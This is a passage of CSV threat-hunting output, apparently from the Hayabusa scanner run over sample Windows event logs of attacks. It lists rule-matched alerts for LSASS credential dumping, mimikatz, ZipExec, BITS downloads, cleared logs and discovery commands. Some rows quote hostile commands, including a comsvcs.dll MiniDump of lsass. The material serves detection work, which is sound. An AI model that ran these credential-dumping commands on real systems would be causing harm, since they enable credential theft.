Log,"C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\vtnr8kff.dmp full;Wait-Process -Id (Get-Process rundll32).id",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,CredAccess,PowerShell Get-Process LSASS in ScriptBlock,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,Exec,Suspicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.396 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"@{ GUID=""EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D"" Author=""Microsoft Corporation"" CompanyName=""Microsoft Corporation"" Copyright=""© Microsoft Corporation. 
All rights reserved."" ModuleVersion=""3.1.0.0"" PowerShellVersion=""3.0"" CLRVersion=""4.0"" NestedModules=""Microsoft.PowerShell.Commands.Management.dll"" HelpInfoURI = 'http://go.microsoft.com/fwlink/?linkid=285756' CmdletsToExport=@(""Add-Content"", ""Clear-Content"", ""Clear-ItemProperty"", ""Join-Path"", ""Convert-Path"", ""Copy-ItemProperty"", ""Get-EventLog"", ""Clear-EventLog"", ""Write-EventLog"", ""Limit-EventLog"", ""Show-EventLog"", ""New-EventLog"", ""Remove-EventLog"", ""Get-ChildItem"", ""Get-Content"", ""Get-ItemProperty"", ""Get-WmiObject"", ""Invoke-WmiMethod"", ""Move-ItemProperty"", ""Get-Location"", ""Set-Location"", ""Push-Location"", ""Pop-Location"", ""New-PSDrive"", ""Remove-PSDrive"", ""Get-PSDrive"", ""Get-Item"", ""New-Item"", ""Set-Item"", ""Remove-Item"", ""Move-Item"", ""Rename-Item"", ""Copy-Item"", ""Clear-Item"", ""Invoke-Item"", ""Get-PSProvider"", ""New-ItemProperty"", ""Split-Path"", ""Test-Path"", ""Get-Process"", ""Stop-Process"", ""Wait-Process"", ""Debug-Process"", ""Start-Process"", ""Remove-ItemProperty"", ""Remove-WmiObject"", ""Rename-ItemProperty"", ""Register-WmiEvent"", ""Resolve-Path"", ""Get-Service"", ""Stop-Service"", ""Start-Service"", ""Suspend-Service"", ""Resume-Service"", ""Restart-Service"", ""Set-Service"", ""New-Service"", ""Set-Content"", ""Set-ItemProperty"", ""Set-WmiInstance"", ""Get-Transaction"", ""Start-Transaction"", ""Complete-Transaction"", ""Undo-Transaction"", ""Use-Transaction"", ""New-WebServiceProxy"", ""Get-HotFix"", ""Test-Connection"", ""Enable-ComputerRestore"", ""Disable-ComputerRestore"", ""Checkpoint-Computer"", ""Get-ComputerRestorePoint"", ""Restart-Computer"", ""Stop-Computer"", ""Restore-Computer"", ""Add-Computer"", ""Remove-Computer"", ""Test-ComputerSecureChannel"", ""Reset-ComputerMachinePassword"", ""Rename-Computer"", ""Get-ControlPanelItem"", ""Show-ControlPanelItem"") 
}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.396 +09:00,FS03.offsec.lan,4104,low,Persis,Suspicious Get-WmiObject,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_gwmi.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.396 +09:00,FS03.offsec.lan,4104,high,Exec,Suspicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.427 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Process): ""Get-Process"" ParameterBinding(Get-Process): name=""Name""; value=""lsass""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.427 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Process): ""Get-Process"" ParameterBinding(Get-Process): name=""Name""; value=""rundll32""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: cscript.exe //e:jscript testme.js | Process: C:\Windows\System32\cscript.exe | User: 
LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x779c2 | PID: 28176 | PGUID: 00247C92-94D6-6171-0000-00100514967B",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx 2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,medium,Exec,WSF/JSE/JS/VBA/VBE File Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_script_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx 2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmdkey.exe"" /generic:Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip /pass:tWIMmIF /user:"""" | Process: C:\Windows\System32\cmdkey.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: cscript.exe //e:jscript testme.js | LID: 0x779c2 | PID: 15156 | PGUID: 00247C92-94D6-6171-0000-00103F5A967B",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx 2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,medium,Exec | Evas,Suspicious ZipExec Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx 2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,medium,LatMov,Remote Desktop Protocol Use Mstsc,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mstsc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx 2021-10-22 01:27:03.398 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\lync.zip | Process: C:\windows\system32\cscript.exe | PID: 28176 | PGUID: 00247C92-94D6-6171-0000-00100514967B,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx 2021-10-22 01:27:12.523 
+09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip | Process: C:\windows\system32\cscript.exe | PID: 28176 | PGUID: 00247C92-94D6-6171-0000-00100514967B,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx 2021-10-22 01:27:12.549 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe | Process: C:\windows\system32\cscript.exe | PID: 28176 | PGUID: 00247C92-94D6-6171-0000-00100514967B,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx 2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe"" | Process: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: cscript.exe //e:jscript testme.js | LID: 0x779c2 | PID: 17264 | PGUID: 00247C92-94E0-6171-0000-00107424987B",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx 2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,high,Exec,Script Interpreter Execution From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx 2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,medium,Evas,Renamed Binary,,../hayabusa-rules/sigma/process_creation/proc_creation_win_renamed_binary.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx 2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,medium,Impact,Run from a Zip File,,../hayabusa-rules/sigma/process_creation/proc_creation_win_run_from_zip.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx 2021-10-22 01:27:12.858 
+09:00,LAPTOP-JU4M3I0E,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx 2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmdkey.exe"" /delete Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip | Process: C:\Windows\System32\cmdkey.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: cscript.exe //e:jscript testme.js | LID: 0x779c2 | PID: 19000 | PGUID: 00247C92-94E0-6171-0000-0010B84D987B",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx 2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,medium,Exec | Evas,Suspicious ZipExec Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx 2021-10-22 01:27:14.015 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" popup ""Malicious Behavior Detection Alert"" ""Elastic Security detected Execution via Renamed Signed Binary Proxy"" ""C:\Program Files\Elastic\Endpoint\cache\resources\elastic-endpoint-security.png"" | Process: C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" run | LID: 0x779c2 | PID: 26868 | PGUID: 00247C92-94E0-6171-0000-00104337987B",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx 2021-10-22 02:38:36.711 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md -Destination 
C:\Users\bits.ps1,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx 2021-10-22 02:38:36.711 +09:00,FS03.offsec.lan,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx 2021-10-22 02:38:36.742 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Join-Path): ""Join-Path"" ParameterBinding(Join-Path): name=""Path""; value=""C:\windows\system32\windowspowershell\v1.0\Modules\BitsTransfer"" ParameterBinding(Join-Path): name=""ChildPath""; value=""Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx 2021-10-22 02:38:36.742 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"@{ GUID=""{8FA5064B-8479-4c5c-86EA-0D311FE48875}"" Author=""Microsoft Corporation"" CompanyName=""Microsoft Corporation"" Copyright=""© Microsoft Corporation. 
All rights reserved."" ModuleVersion=""1.0.0.0"" PowerShellVersion=""2.0"" CLRVersion=""2.0"" NestedModules=""Microsoft.BackgroundIntelligentTransfer.Management"" FormatsToProcess=""BitsTransfer.Format.ps1xml"" RequiredAssemblies=Join-Path $psScriptRoot ""Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll"" CmdletsToExport=""Add-BitsFile"",""Complete-BitsTransfer"",""Get-BitsTransfer"",""Remove-BitsTransfer"",""Resume-BitsTransfer"",""Set-BitsTransfer"",""Start-BitsTransfer"",""Suspend-BitsTransfer"" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx 2021-10-22 02:38:36.742 +09:00,FS03.offsec.lan,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx 2021-10-22 02:38:37.084 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Start-BitsTransfer): ""Start-BitsTransfer"" ParameterBinding(Start-BitsTransfer): name=""Priority""; value=""foreground"" ParameterBinding(Start-BitsTransfer): name=""Source""; value=""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md"" ParameterBinding(Start-BitsTransfer): name=""Destination""; value=""C:\Users\bits.ps1""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx 2021-10-22 02:38:37.084 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[System.Diagnostics.DebuggerHidden()] param() $foundSuggestion = $false if($lastError -and ($lastError.Exception -is 
""System.Management.Automation.CommandNotFoundException"")) { $escapedCommand = [System.Management.Automation.WildcardPattern]::Escape($lastError.TargetObject) $foundSuggestion = @(Get-Command ($ExecutionContext.SessionState.Path.Combine(""."", $escapedCommand)) -ErrorAction Ignore).Count -gt 0 } $foundSuggestion",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx 2021-10-22 02:38:37.084 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"""The command $($lastError.TargetObject) was not found, but does exist in the current location. Windows PowerShell does not load commands from the current location by default. If you trust this command, instead type `"".\$($lastError.TargetObject)`"". See `""get-help about_Command_Precedence`"" for more details.""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx 2021-10-22 02:38:37.084 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx 2021-10-22 02:38:37.100 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx 2021-10-22 02:53:42.530 +09:00,FS03.offsec.lan,59,info,Evas | Persis,Bits Job Created,Job Title: BITS Transfer | URL: 
https://releases.ubuntu.com/20.04.3/ubuntu-20.04.3-desktop-amd64.iso,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID60-High volume file downloaded with BITS.evtx 2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: mimikatz.exe | Process: C:\TOOLS\Mimikatzx64\mimikatz.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1f4c65f | PID: 2032 | PGUID: 7CF65FC7-D02C-6171-1203-000000001200 | Hash: SHA1=D241DF7B9D2EC0B8194751CD5CE153E27CC40FA4,MD5=A3CB3B02A683275F7E0A0F8A9A5C9E07,SHA256=31EB1DE7E840A342FD468E558E5AB627BCB4C542A8FE01AEC4D5BA01D539A0FC,IMPHASH=DBDEA7B557F0E6B5D9E18ABE9CE5220A",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx 2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx 2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: mimikatz.exe | LID: 0x2e6dea4 | PID: 5040 | PGUID: 7CF65FC7-D04B-6171-1303-000000001200 | Hash: 
SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx 2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx 2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,low,,Process Access,Src Process: C:\TOOLS\Mimikatzx64\mimikatz.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 2032 | Src PGUID: 7CF65FC7-D02C-6171-1203-000000001200 | Tgt PID: 512 | Tgt PGUID: 7CF65FC7-6649-6165-0B00-000000001200,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx 2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx 2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx 2021-10-22 22:39:49.619 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: 
admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx 2021-10-22 22:39:50.927 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh advfirewall show allprofiles | Path: C:\Windows\System32\netsh.exe | PID: 0x1328 | User: admmig | LID: 0x1f4c65f,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx 2021-10-22 22:39:55.502 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh a show allprofiles | Path: C:\Windows\System32\netsh.exe | PID: 0x10c4 | User: admmig | LID: 0x1f4c65f,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx 2021-10-22 23:02:11.218 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx 2021-10-22 23:02:11.902 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: schtasks /query /xml | Path: C:\Windows\System32\schtasks.exe | PID: 0xce0 | User: admmig | LID: 0x1f4c65f,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled 
task configuration enumeration.evtx 2021-10-22 23:02:15.177 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Sysmon\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x3198a75,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx 2021-10-24 06:50:11.666 +09:00,FS03.offsec.lan,4625,low,,Logon Failure - Unknown Reason,User: - | Type: 10 | Computer: - | IP Addr: 10.23.23.9 | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-failed login with denied access due to account restriction.evtx 2021-10-24 06:51:57.212 +09:00,FS03.offsec.lan,4625,low,,Logon Failure - Unknown Reason,User: - | Type: 10 | Computer: - | IP Addr: 10.23.23.9 | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-failed login with denied access due to account restriction.evtx 2021-10-25 16:23:05.426 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-NetFirewallProfile,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.457 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"@{ ModuleVersion = '2.0.0.0' FormatsToProcess = 'NetSecurity.formats.ps1xml' TypesToProcess = 'NetSecurity.types.ps1xml' NestedModules = @( ""Microsoft.Windows.Firewall.Commands.dll"", 
""NetFirewallRule.cmdletDefinition.cdxml"", ""NetIPsecRule.cmdletDefinition.cdxml"", ""NetIPsecMainModeRule.cmdletDefinition.cdxml"", ""NetFirewallAddressFilter.cmdletDefinition.cdxml"", ""NetFirewallApplicationFilter.cmdletDefinition.cdxml"", ""NetFirewallInterfaceFilter.cmdletDefinition.cdxml"", ""NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml"", ""NetFirewallSecurityFilter.cmdletDefinition.cdxml"", ""NetFirewallPortFilter.cmdletDefinition.cdxml"", ""NetFirewallServiceFilter.cmdletDefinition.cdxml"", ""NetIPsecPhase1AuthSet.cmdletDefinition.cdxml"", ""NetIPsecPhase2AuthSet.cmdletDefinition.cdxml"", ""NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml"", ""NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml"", ""NetFirewallProfile.cmdletDefinition.cdxml"", ""NetIPsecPolicyChange.cmdletDefinition.cdxml"", ""NetIPsecDospSetting.cmdletDefinition.cdxml"", ""NetIPsecIdentity.cmdletDefinition.cdxml"", ""NetIPsecMainModeSA.cmdletDefinition.cdxml"", ""NetIPsecQuickModeSA.cmdletDefinition.cdxml"", ""NetFirewallSetting.cmdletDefinition.cdxml"", ""NetGPO.cmdletDefinition.cdxml"" ) GUID = '{4B26FF51-7AEE-4731-9CF7-508B82532CBF}' Author = 'Microsoft Corporation' CompanyName = 'Microsoft Corporation' PowerShellVersion = '3.0' ClrVersion = '4.0' Copyright = '© Microsoft Corporation. All rights reserved.' 
HelpInfoUri = ""http://go.microsoft.com/fwlink/?linkid=285764"" FunctionsToExport = @( ""Copy-NetFirewallRule"", ""Copy-NetIPsecMainModeCryptoSet"", ""Copy-NetIPsecMainModeRule"", ""Copy-NetIPsecPhase1AuthSet"", ""Copy-NetIPsecPhase2AuthSet"", ""Copy-NetIPsecQuickModeCryptoSet"", ""Copy-NetIPsecRule"", ""Disable-NetFirewallRule"", ""Disable-NetIPsecMainModeRule"", ""Disable-NetIPsecRule"", ""Enable-NetFirewallRule"", ""Enable-NetIPsecMainModeRule"", ""Enable-NetIPsecRule"", ""Get-NetFirewallAddressFilter"", ""Get-NetFirewallApplicationFilter"", ""Get-NetFirewallInterfaceFilter"", ""Get-NetFirewallInterfaceTypeFilter"", ""Get-NetFirewallPortFilter"", ""Get-NetFirewallProfile"", ""Get-NetFirewallRule"", ""Get-NetFirewallSecurityFilter"", ""Get-NetFirewallServiceFilter"", ""Get-NetFirewallSetting"", ""Get-NetIPsecDospSetting"", ""Get-NetIPsecMainModeCryptoSet"", ""Get-NetIPsecMainModeRule"", ""Get-NetIPsecMainModeSA"", ""Get-NetIPsecPhase1AuthSet"", ""Get-NetIPsecPhase2AuthSet"", ""Get-NetIPsecQuickModeCryptoSet"", 